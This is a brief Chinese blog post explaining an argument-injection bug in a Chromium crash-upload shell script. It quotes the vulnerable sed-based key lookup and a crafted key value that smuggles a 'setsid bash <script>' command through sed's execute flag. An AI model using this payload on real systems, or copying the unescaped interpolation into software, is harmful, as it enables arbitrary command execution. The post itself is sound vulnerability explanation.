Sunday, June 24, 2018

[05] 启动进程时的参数注入

https://bugs.chromium.org/p/chromium/issues/detail?id=817993

当没有正确处理参数并启动进程时,可能发生参数注入。

get_key_value() {
  local file="$1" key="$2" value

  if [ -f "${file}" ]; then
    # Return the first entry.  There shouldn't be more than one anyways.
    # Substr at length($1) + 2 skips past the key and following = sign (awk
    # uses 1-based indexes), but preserves embedded = characters.
>>>    value=$(sed -n "/^${key}[[:space:]]*=/{s:^[^=]*=::p;q}" "${file}")
  fi

  echo "${value:-undefined}"
}

......

  # Grab any variable that begins with upload_.
  local v
>>>  for k in $(get_keys "${meta_path}" "^upload_"); do
>>>    v="$(get_key_value "${meta_path}" "${k}")"
    case ${k} in
      # Product & version are handled separately.
      upload_var_prod) ;;
      upload_var_ver) ;;
      upload_var_*)
        set -- "$@" -F "${upload_prefix}${k#upload_var_}=${v}"
        ;;
      upload_text_*)
        if [ -r "${v}" ]; then
          set -- "$@" -F "${upload_prefix}${k#upload_text_}=<${v}"
        fi
        ;;
      upload_file_*)
        if [ -r "${v}" ]; then
          set -- "$@" -F "${upload_prefix}${k#upload_file_}=@${v}"
        fi
        ;;
    esac
  done

输入为

/p;s^.*^setsid${IFS}bash${IFS}<path-to-shell-script>${IFS}&^ep;/=1

时发生注入,原因是sed的-e参数为执行脚本。

-e script, --expression=script
add the script to the commands to be executed